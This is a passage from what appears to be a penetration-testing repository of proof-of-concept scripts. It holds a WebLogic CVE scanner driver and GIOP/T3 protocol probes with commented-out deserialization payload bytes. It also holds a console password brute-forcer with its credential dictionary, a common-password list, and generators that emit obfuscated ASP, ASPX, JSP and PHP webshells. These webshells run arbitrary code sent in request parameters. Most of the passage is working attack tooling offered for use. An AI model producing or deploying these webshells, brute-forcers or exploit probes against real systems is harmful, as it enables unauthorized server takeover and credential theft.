testing...') 81 | 82 | print('[*]CVE_2018_2628 need you check in yourself') 83 | 84 | 85 | #print('[*]CVE_2018_2893 is testing...') 86 | 87 | print('[*]CVE_2018_2893 need you check in yourself') 88 | 89 | print('[*]CVE_2018_2894 is testing...') 90 | try: 91 | Weblogic.CVE_2018_2894.run(rip, rport, 0) 92 | except: 93 | print("[-]CVE_2018_2894 not detected.") 94 | 95 | print('[*]CVE_2019_2725 is testing...') 96 | try: 97 | Weblogic.CVE_2019_2725.run(rip, rport, 0) 98 | except: 99 | print("[-]CVE_2019_2725 not detected.") 100 | 101 | print('[*]CVE_2019_2729 is testing...') 102 | try: 103 | Weblogic.CVE_2019_2729.run(rip, rport, 0) 104 | except: 105 | print("[-]CVE_2019_2729 not detected.") 106 | 107 | print ("[*]Happy End,the goal is {}:{}".format(rip,rport)) 108 | 109 | print('[*]Usage: [IP] [PORT=7001]') 110 | def check(**kwargs): 111 | url = kwargs['url'] 112 | port = 
int('8002') 113 | PocS(url,port) 114 | 115 | if __name__ == '__main__': 116 | print(banner) 117 | print('Welcome To WeblogicScan !!!\nWhoami:rabbitmask.github.io') 118 | if len(sys.argv)<3: 119 | print('Usage: python3 WeblogicScan [IP] [PORT]') 120 | else: 121 | url = sys.argv[1] 122 | port = int(sys.argv[2]) 123 | check(url,port) 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | -------------------------------------------------------------------------------- /POC/Weblogic_GIOP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket,ssl 3 | import struct 4 | from urllib.parse import urlparse 5 | 6 | # Send headers 7 | IIOP_headers = bytes.fromhex('47494f50010200030000001700000002000000000000000b4e616d6553657276696365') 8 | 9 | def handleURL(url): 10 | getipport = urlparse(url) 11 | hostname = getipport.hostname 12 | port = getipport.port 13 | if port == None and r"https://" in url: 14 | port = 443 15 | elif port == None and r"http://" in url: 16 | port = 80 17 | if r"https://" in url: 18 | url = "https://"+hostname+":"+str(port) 19 | if r"http://" in url: 20 | url = "http://"+hostname+":"+str(port) 21 | if r"https" in url: 22 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) 23 | else: 24 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | return hostname,port,sock 26 | 27 | def check(**kwargs): 28 | if 'http' in kwargs['url']: 29 | hostname,port,sock = handleURL(kwargs['url']) 30 | server_address = (hostname, port) 31 | elif ':' in kwargs['url']: 32 | server_address = (kwargs['url'].split(":")[0],int(kwargs['url'].split(":")[1])) 33 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | else: 35 | print('输入错误, 请输入 URL链接 或者 IP:PORT !') 36 | return 37 | print('[+] Connecting to %s port %s' % server_address) 38 | sock.settimeout(5) 39 | try: 40 | sock.connect(server_address) 41 | print('sending:\n%s' % 
IIOP_headers.decode("utf-8", "ignore")) 42 | sock.sendall(IIOP_headers) 43 | data = sock.recv(20) 44 | print('received:\n%s' % data.decode("utf-8", "ignore")) 45 | sock.sendall(IIOP_headers) 46 | if b'GIOP' in data: 47 | print('%s 目标启用GIOP协议!'%server_address[0]) 48 | return 1 49 | else: 50 | print('%s 目标已禁用GIOP协议!'%server_address[0]) 51 | return 0 52 | except Exception as e: 53 | print(e) 54 | finally: 55 | sock.close() 56 | return 0 57 | 58 | 59 | #payloadObj = open(sys.argv[3],'rb').read() 60 | 61 | #payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00' 62 | #payload=payload.encode()+payloadObj 63 | 64 | # adjust header for appropriate message length 65 | #payload=struct.pack('>I',len(payload)) + payload[4:] 66 | 67 | #print('[+] Sending payload...') 68 | #sock.send(payload) 69 | #data = sock.recv(1024) 70 | #print('received "%s"' % data) 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | -------------------------------------------------------------------------------- /POC/Weblogic_T3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket,ssl 3 | import struct 4 | import binascii 5 | from urllib.parse import urlparse 6 | 7 | # Send headers 8 | T3_headers = 't3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://localhost:7001\nLP:DOMAIN\n\n' 9 | #十六进制发送 10 | T3_hex = binascii.unhexlify("74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a50553a74333a2f2f75732d6c2d627265656e733a373030310a0a00000583016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e6") 
11 | 12 | def handleURL(url): 13 | getipport = urlparse(url) 14 | hostname = getipport.hostname 15 | port = getipport.port 16 | if port == None and r"https://" in url: 17 | port = 443 18 | elif port == None and r"http://" in url: 19 | port = 80 20 | if r"https://" in url: 21 | url = "https://"+hostname+":"+str(port) 22 | if r"http://" in url: 23 | url = "http://"+hostname+":"+str(port) 24 | if r"https" in url: 25 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) 26 | else: 27 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | return hostname,port,sock 29 | 30 | def check(**kwargs): 31 | if 'http' in kwargs['url']: 32 | hostname,port,sock = handleURL(kwargs['url']) 33 | server_address = (hostname, port) 34 | elif ':' in kwargs['url']: 35 | server_address = (kwargs['url'].split(":")[0],int(kwargs['url'].split(":")[1])) 36 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 37 | else: 38 | print('输入错误, 请输入 URL链接 或者 IP:PORT !') 39 | return 40 | print('[+] Connecting to %s port %s' % server_address) 41 | sock.settimeout(5) 42 | try: 43 | sock.connect(server_address) 44 | print('sending:\n%s' % T3_headers) 45 | sock.sendall(T3_headers.encode()) 46 | #print('sending:\n%s' % T3_hex.decode("utf-8", "ignore")) 47 | #sock.sendall(T3_hex) 48 | data = sock.recv(1024) 49 | print('received:\n%s' % data.decode()) 50 | except Exception as e: 51 | print(e) 52 | finally: 53 | sock.close() 54 | 55 | #payloadObj = open(sys.argv[3],'rb').read() 56 | 57 | #payload = '\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00' 58 | 
#payload=payload.encode()+payloadObj 59 | 60 | # adjust header for appropriate message length 61 | #payload=struct.pack('>I',len(payload)) + payload[4:] 62 | 63 | #print('[+] Sending payload...') 64 | #sock.send(payload) 65 | #data = sock.recv(1024) 66 | #print('received "%s"' % data) 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /POC/Weblogic_weakPass.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | print('[*]Usage: [IP] [7001]') 5 | def check(**kwargs): 6 | url = kwargs['url'] 7 | port = int('80') 8 | """weak password""" 9 | 10 | pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem', 'weblogic123', 'Weblogic123'] 11 | for user in pwddict: 12 | for pwd in pwddict: 13 | data = { 14 | 'j_username':user, 15 | 'j_password':pwd, 16 | 'j_character_encoding':'UTF-8' 17 | } 18 | req = requests.post('http://'+url+':'+str(port)+'/console/j_security_check', data=data, allow_redirects=False, verify=False, timeout=3) 19 | 20 | if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text: 21 | print('[+] WebLogic username: '+user+' password: '+pwd) 22 | return 1 23 | print('[-]don not have weakPass!') 24 | return 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /POC/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/POC/__init__.py -------------------------------------------------------------------------------- /POC/js_examples/enpassword.js: -------------------------------------------------------------------------------- 1 | /** 2 | *@param username 3 | *@param passwordOrgin 4 | *@return encrypt password for 
$username who use orign password $passwordOrgin 5 | * 6 | **/ 7 | 8 | function encrypt(username, passwordOrgin) { 9 | return hex_sha1(username+hex_sha1(passwordOrgin)); 10 | } 11 | 12 | 13 | 14 | function hex_sha1(s, hexcase) { 15 | if (!(arguments) || !(arguments.length) || arguments.length < 1) { 16 | return binb2hex(core_sha1(AlignSHA1("aiact@163.com")), true); 17 | } else { 18 | if (arguments.length == 1) { 19 | return binb2hex(core_sha1(AlignSHA1(arguments[0])), true); 20 | } else { 21 | return binb2hex(core_sha1(AlignSHA1(arguments[0])), arguments[1]); 22 | } 23 | } 24 | // return binb2hex(core_sha1(AlignSHA1(s)),hexcase); 25 | } 26 | /**/ 27 | /* 28 | * Perform a simple self-test to see if the VM is working 29 | */ 30 | function sha1_vm_test() { 31 | return hex_sha1("abc",false) == "a9993e364706816aba3e25717850c26c9cd0d89d"; 32 | } 33 | /**/ 34 | /* 35 | * Calculate the SHA-1 of an array of big-endian words, and a bit length 36 | */ 37 | function core_sha1(blockArray) { 38 | var x = blockArray; //append padding 39 | var w = Array(80); 40 | var a = 1732584193; 41 | var b = -271733879; 42 | var c = -1732584194; 43 | var d = 271733878; 44 | var e = -1009589776; 45 | for (var i = 0; i < x.length; i += 16) { //每次处理512位 16*32 46 | var olda = a; 47 | var oldb = b; 48 | var oldc = c; 49 | var oldd = d; 50 | var olde = e; 51 | for (var j = 0; j < 80; j += 1) { //对每个512位进行80步操作 52 | if (j < 16) { 53 | w[j] = x[i + j]; 54 | } else { 55 | w[j] = rol(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1); 56 | } 57 | var t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)), safe_add(safe_add(e, w[j]), sha1_kt(j))); 58 | e = d; 59 | d = c; 60 | c = rol(b, 30); 61 | b = a; 62 | a = t; 63 | } 64 | a = safe_add(a, olda); 65 | b = safe_add(b, oldb); 66 | c = safe_add(c, oldc); 67 | d = safe_add(d, oldd); 68 | e = safe_add(e, olde); 69 | } 70 | return new Array(a, b, c, d, e); 71 | } 72 | /**/ 73 | /* 74 | * Perform the appropriate triplet combination function for the current 
iteration 75 | * 返回对应F函数的值 76 | */ 77 | function sha1_ft(t, b, c, d) { 78 | if (t < 20) { 79 | return (b & c) | ((~b) & d); 80 | } 81 | if (t < 40) { 82 | return b ^ c ^ d; 83 | } 84 | if (t < 60) { 85 | return (b & c) | (b & d) | (c & d); 86 | } 87 | return b ^ c ^ d; //t<80 88 | } 89 | /**/ 90 | /* 91 | 92 | * Determine the appropriate additive constant for the current iteration 93 | * 返回对应的Kt值 94 | */ 95 | function sha1_kt(t) { 96 | return (t < 20) ? 1518500249 : (t < 40) ? 1859775393 : (t < 60) ? -1894007588 : -899497514; 97 | } 98 | /**/ 99 | /* 100 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally 101 | * to work around bugs in some JS interpreters. 102 | * 将32位数拆成高16位和低16位分别进行相加,从而实现 MOD 2^32 的加法 103 | */ 104 | function safe_add(x, y) { 105 | var lsw = (x & 65535) + (y & 65535); 106 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16); 107 | return (msw << 16) | (lsw & 65535); 108 | } 109 | /**/ 110 | /* 111 | * Bitwise rotate a 32-bit number to the left. 112 | * 32位二进制数循环左移 113 | */ 114 | function rol(num, cnt) { 115 | return (num << cnt) | (num >>> (32 - cnt)); 116 | } 117 | /**/ 118 | /* 119 | 120 | * The standard SHA1 needs the input string to fit into a block 121 | 122 | * This function align the input string to meet the requirement 123 | 124 | */ 125 | function AlignSHA1(str) { 126 | var nblk = ((str.length + 8) >> 6) + 1, blks = new Array(nblk * 16); 127 | for (var i = 0; i < nblk * 16; i += 1) { 128 | blks[i] = 0; 129 | } 130 | for (i = 0; i < str.length; i += 1) { 131 | blks[i >> 2] |= str.charCodeAt(i) << (24 - (i & 3) * 8); 132 | } 133 | blks[i >> 2] |= 128 << (24 - (i & 3) * 8); 134 | blks[nblk * 16 - 1] = str.length * 8; 135 | return blks; 136 | } 137 | /**/ 138 | /* 139 | * Convert an array of big-endian words to a hex string. 140 | */ 141 | function binb2hex(binarray, hexcase) { 142 | var hex_tab = hexcase ? 
"0123456789ABCDEF" : "0123456789abcdef"; 143 | var str = ""; 144 | for (var i = 0; i < binarray.length * 4; i += 1) { 145 | str += hex_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8 + 4)) & 15) + hex_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8)) & 15); 146 | } 147 | return str; 148 | } 149 | 150 | -------------------------------------------------------------------------------- /POC/js_examples/top100password.txt: -------------------------------------------------------------------------------- 1 | 123456789 2 | a123456 3 | 123456 4 | a123456789 5 | 1234567890 6 | woaini1314 7 | qq123456 8 | abc123456 9 | 123456a 10 | 123456789a 11 | 147258369 12 | zxcvbnm 13 | 987654321 14 | 12345678910 15 | abc123 16 | qq123456789 17 | 123456789. 18 | 7708801314520 19 | woaini 20 | 5201314520 21 | q123456 22 | 123456abc 23 | 1233211234567 24 | 123123123 25 | 123456. 26 | 0123456789 27 | asd123456 28 | aa123456 29 | 135792468 30 | q123456789 31 | abcd123456 32 | 12345678900 33 | woaini520 34 | woaini123 35 | zxcvbnm123 36 | 1111111111111111 37 | w123456 38 | aini1314 39 | abc123456789 40 | 111111 41 | woaini521 42 | qwertyuiop 43 | 1314520520 44 | 1234567891 45 | qwe123456 46 | asd123 47 | 000000 48 | 1472583690 49 | 1357924680 50 | 789456123 51 | 123456789abc 52 | z123456 53 | 1234567899 54 | aaa123456 55 | abcd1234 56 | www123456 57 | 123456789q 58 | 123abc 59 | qwe123 60 | w123456789 61 | 7894561230 62 | 123456qq 63 | zxc123456 64 | 123456789qq 65 | 1111111111 66 | 111111111 67 | 0000000000000000 68 | 1234567891234567 69 | qazwsxedc 70 | qwerty 71 | 123456.. 72 | zxc123 73 | asdfghjkl 74 | 0000000000 75 | 1234554321 76 | 123456q 77 | 123456aa 78 | 9876543210 79 | 110120119 80 | qaz123456 81 | qq5201314 82 | 123698745 83 | 5201314 84 | 000000000 85 | as123456 86 | 123123 87 | 5841314520 88 | z123456789 89 | 52013145201314 90 | a123123 91 | caonima 92 | a5201314 93 | wang123456 94 | abcd123 95 | 123456789.. 
96 | woaini1314520 97 | 123456asd 98 | aa123456789 99 | 741852963 100 | a12345678 -------------------------------------------------------------------------------- /POC/webshell_asp.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<% 7 | 17 | 18 | %>''' 19 | 20 | 21 | 22 | def random_name(len): 23 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 24 | return ''.join(random.sample(str,len)) 25 | 26 | def build_webshell(): 27 | FunctionName = random_name(4) 28 | parameter = random_name(4) 29 | FunctionName1 = random_name(4) 30 | shellc = shell.format(FunctionName,parameter,FunctionName1) 31 | return shellc 32 | 33 | def check(**kwargs): 34 | print (build_webshell()) 35 | 36 | 37 | if __name__ == '__main__': 38 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_aspx.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<%@ Page Language="Jscript" Debug=true%> 7 | <% 8 | var {0}=Request.Form["pureqh"]; 9 | var {1}="unsa",{5}="fe",{4}={1}+{5}; 10 | function {2}() 11 | {6} 12 | return {0}; 13 | {7} 14 | function {3}() 15 | {6} 16 | eval({2}(),{4}); 17 | {7} 18 | {3}() 19 | %>''' 20 | 21 | 22 | 23 | def random_name(len): 24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 25 | return ''.join(random.sample(str,len)) 26 | 27 | def build_webshell(): 28 | parameter = random_name(2) 29 | parameter1 = random_name(3) 30 | FunctionName = random_name(4) 31 | FunctionName1 = random_name(5) 32 | parameter2 = random_name(6) 33 | parameter3 = random_name(7) 34 | lef = '''{''' 35 | rig = '''}''' 36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig) 37 | return shellc 38 | def check(**kwargs): 39 | print 
(build_webshell()) 40 | 41 | if __name__ == '__main__': 42 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_aspx_D.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<%@ Page Language="Jscript" Debug=true%> 7 | <% 8 | function {2}() 9 | {6} 10 | var {0}=Request.Form["zero"]; 11 | return {0}; 12 | {7} 13 | function {3}() 14 | {6} 15 | var {1}="unsa",{5}="fe",{4}={1}+{5}; 16 | eval({2}(),{4}); 17 | {7} 18 | {3}() 19 | %>''' 20 | 21 | 22 | 23 | def random_name(len): 24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 25 | return ''.join(random.sample(str,len)) 26 | 27 | def build_webshell(): 28 | parameter = random_name(4) 29 | parameter1 = random_name(4) 30 | FunctionName = random_name(4) 31 | FunctionName1 = random_name(4) 32 | parameter2 = random_name(4) 33 | parameter3 = random_name(4) 34 | lef = '''{''' 35 | rig = '''}''' 36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig) 37 | return shellc 38 | def check(**kwargs): 39 | print (build_webshell()) 40 | 41 | if __name__ == '__main__': 42 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_jsp.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<%!class {2} extends ClassLoader{0} {2}(ClassLoader {3}){0} super({3}); {1}public Class g(byte []b){0} return super.defineClass(b,0,b.length); {1}{1}%><% String cls=request.getParameter("zero");if(cls!=null){0} new {2}(this.\u0067etClass().\u0067etClassLoader()).g(new sun.misc.{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}().decodeBuffer(cls)).newInstance().equals(pageContext); {1}%> 7 | ''' 8 | 9 | 10 | 11 | def 
random_name(len): 12 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 13 | return ''.join(random.sample(str,len)) 14 | 15 | def build_webshell(): 16 | arr1 = ['\u0042','B'] 17 | arr2 = ['\u0041','A'] 18 | arr3 = ['\u0053','S'] 19 | arr4 = ['\u0045','E'] 20 | arr5 = ['\u0036','6'] 21 | arr6 = ['\u0034','4'] 22 | arr7 = ['\u0044','D'] 23 | arr8 = ['\u0065','e'] 24 | arr9 = ['\u0063','c'] 25 | arr10 = ['\u006f','o'] 26 | arr11 = ['\u0064','d'] 27 | arr12 = ['\u0065','e'] 28 | arr13 = ['\u0072','r'] 29 | 30 | lef = '''{''' 31 | rig = '''}''' 32 | var1 = random_name(4) 33 | var2 = random_name(4) 34 | var3 = random.choice(arr1) 35 | var4 = random.choice(arr2) 36 | var5 = random.choice(arr3) 37 | var6 = random.choice(arr4) 38 | var7 = random.choice(arr5) 39 | var8 = random.choice(arr6) 40 | var9 = random.choice(arr7) 41 | var10 = random.choice(arr8) 42 | var11 = random.choice(arr9) 43 | var12 = random.choice(arr10) 44 | var13 = random.choice(arr11) 45 | var14 = random.choice(arr12) 46 | var15 = random.choice(arr13) 47 | shellc = shell.format(lef,rig,var1,var2,var3,var4,var5,var6,var7,var8,var9,var10,var11,var12,var13,var14,var15) 48 | return shellc 49 | 50 | def check(**kwargs): 51 | print (build_webshell()) 52 | if __name__ == '__main__': 53 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_php.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | #use:GET:http://url?pass=pureqh POST:zero 6 | 7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy'; 14 | $this->{3} = @{9}($this->{2}); 15 | @eval({5}.$this->{3}.{5}); 16 | {4}{4}{4} 17 | new {0}(); 18 | function {6}(${7}){1} 19 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567'; 20 | ${8} = ''; 21 | $v = 0; 22 | $vbits = 0; 23 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 24 | $v <<= 8; 25 | $v += ord(${7}[$i]); 26 | $vbits += 8; 27 
| while ($vbits >= 5) {1} 28 | $vbits -= 5; 29 | ${8} .= $BASE32_ALPHABET[$v >> $vbits]; 30 | $v &= ((1 << $vbits) - 1);{4}{4} 31 | if ($vbits > 0){1} 32 | $v <<= (5 - $vbits); 33 | ${8} .= $BASE32_ALPHABET[$v];{4} 34 | return ${8};{4} 35 | function {9}(${7}){1} 36 | ${8} = ''; 37 | $v = 0; 38 | $vbits = 0; 39 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 40 | $v <<= 5; 41 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1} 42 | $v += (ord(${7}[$i]) - 97); 43 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1} 44 | $v += (24 + ${7}[$i]); 45 | {4} else {1} 46 | exit(1); 47 | {4} 48 | $vbits += 5; 49 | while ($vbits >= 8){1} 50 | $vbits -= 8; 51 | ${8} .= chr($v >> $vbits); 52 | $v &= ((1 << $vbits) - 1);{4}{4} 53 | return ${8};{4} 54 | ?>''' 55 | 56 | 57 | def random_keys(len): 58 | str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 59 | return ''.join(random.sample(str,len)) 60 | 61 | def random_name(len): 62 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 63 | return ''.join(random.sample(str,len)) 64 | 65 | def build_webshell(): 66 | className = random_name(4) 67 | lef = '''{''' 68 | parameter1 = random_name(4) 69 | parameter2 = random_name(4) 70 | rig = '''}''' 71 | disrupt = "\"/*"+random_keys(7)+"*/\"" 72 | fun1 = random_name(4) 73 | fun1_vul = random_name(4) 74 | fun1_ret = random_name(4) 75 | fun2 = random_name(4) 76 | shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2) 77 | return shellc 78 | def check(**kwargs): 79 | print (build_webshell()) 80 | 81 | if __name__ == '__main__': 82 | print (build_webshell()) 83 | -------------------------------------------------------------------------------- /POC/webshell_php_D.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | #use: POST:zero 6 | 7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy'; 13 | $this->{3} = 
@{9}($this->{2}); 14 | @eval({5}.$this->{3}.{5}); 15 | {4}{4} 16 | new {0}(); 17 | function {6}(${7}){1} 18 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567'; 19 | ${8} = ''; 20 | $v = 0; 21 | $vbits = 0; 22 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 23 | $v <<= 8; 24 | $v += ord(${7}[$i]); 25 | $vbits += 8; 26 | while ($vbits >= 5) {1} 27 | $vbits -= 5; 28 | ${8} .= $BASE32_ALPHABET[$v >> $vbits]; 29 | $v &= ((1 << $vbits) - 1);{4}{4} 30 | if ($vbits > 0){1} 31 | $v <<= (5 - $vbits); 32 | ${8} .= $BASE32_ALPHABET[$v];{4} 33 | return ${8};{4} 34 | function {9}(${7}){1} 35 | ${8} = ''; 36 | $v = 0; 37 | $vbits = 0; 38 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 39 | $v <<= 5; 40 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1} 41 | $v += (ord(${7}[$i]) - 97); 42 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1} 43 | $v += (24 + ${7}[$i]); 44 | {4} else {1} 45 | exit(1); 46 | {4} 47 | $vbits += 5; 48 | while ($vbits >= 8){1} 49 | $vbits -= 8; 50 | ${8} .= chr($v >> $vbits); 51 | $v &= ((1 << $vbits) - 1);{4}{4} 52 | return ${8};{4} 53 | ?>''' 54 | 55 | 56 | def random_keys(len): 57 | str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 58 | return ''.join(random.sample(str,len)) 59 | 60 | def random_name(len): 61 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 62 | return ''.join(random.sample(str,len)) 63 | 64 | def build_webshell(): 65 | className = random_name(4) 66 | lef = '''{''' 67 | parameter1 = random_name(4) 68 | parameter2 = random_name(4) 69 | rig = '''}''' 70 | disrupt = "\"/*"+random_keys(7)+"*/\"" 71 | fun1 = random_name(4) 72 | fun1_vul = random_name(4) 73 | fun1_ret = random_name(4) 74 | fun2 = random_name(4) 75 | shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2) 76 | return shellc 77 | 78 | def check(**kwargs): 79 | print (build_webshell()) 80 | if __name__ == '__main__': 81 | print (build_webshell()) 
-------------------------------------------------------------------------------- /POC/模板.py: -------------------------------------------------------------------------------- 1 | inp = b'\xac\xed' 2 | 3 | print(format(int(inp, 16), 'b')) -------------------------------------------------------------------------------- /Proxy/WebRequest.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: WebRequest 5 | Description : Network Requests Class 6 | Author : J_hao 7 | date: 2017/7/31 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2017/7/31: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'J_hao' 14 | 15 | from requests.models import Response 16 | from lxml import etree 17 | import requests 18 | import random 19 | import time 20 | 21 | from Proxy.handler.logHandler import LogHandler 22 | 23 | requests.packages.urllib3.disable_warnings() 24 | 25 | 26 | class WebRequest(object): 27 | name = "Web_Request" 28 | 29 | def __init__(self, *args, **kwargs): 30 | self.log = LogHandler(self.name, file=False) 31 | self.response = Response() 32 | #self.log = logging.getLogger("web_request") 33 | #self.log.setLevel(logging.DEBUG) 34 | #self.response = Response() 35 | 36 | @property 37 | def user_agent(self): 38 | """ 39 | return an User-Agent at random 40 | :return: 41 | """ 42 | ua_list = [ 43 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101', 44 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122', 45 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71', 46 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95', 47 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) 
Chrome/21.0.1180.71', 48 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)', 49 | 'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50', 50 | 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 51 | ] 52 | return random.choice(ua_list) 53 | 54 | @property 55 | def header(self): 56 | """ 57 | basic header 58 | :return: 59 | """ 60 | return {'User-Agent': self.user_agent, 61 | 'Accept': '*/*', 62 | 'Connection': 'keep-alive', 63 | 'Accept-Language': 'zh-CN,zh;q=0.8'} 64 | 65 | def get(self, url, header=None, retry_time=3, retry_interval=5, timeout=5, *args, **kwargs): 66 | """ 67 | get method 68 | :param url: target url 69 | :param header: headers 70 | :param retry_time: retry time 71 | :param retry_interval: retry interval 72 | :param timeout: network timeout 73 | :return: 74 | """ 75 | headers = self.header 76 | if header and isinstance(header, dict): 77 | headers.update(header) 78 | while True: 79 | try: 80 | self.response = requests.get(url, headers=headers, timeout=timeout, verify=False, *args, **kwargs) 81 | return self 82 | except Exception as e: 83 | self.log.error("requests: %s error: %s" % (url, str(e))) 84 | retry_time -= 1 85 | if retry_time <= 0: 86 | resp = Response() 87 | resp.status_code = 200 88 | return self 89 | self.log.info("retry %s second after" % retry_interval) 90 | time.sleep(retry_interval) 91 | 92 | def respheader(self, key): 93 | try: 94 | return self.response.headers[key] 95 | except Exception as e: 96 | 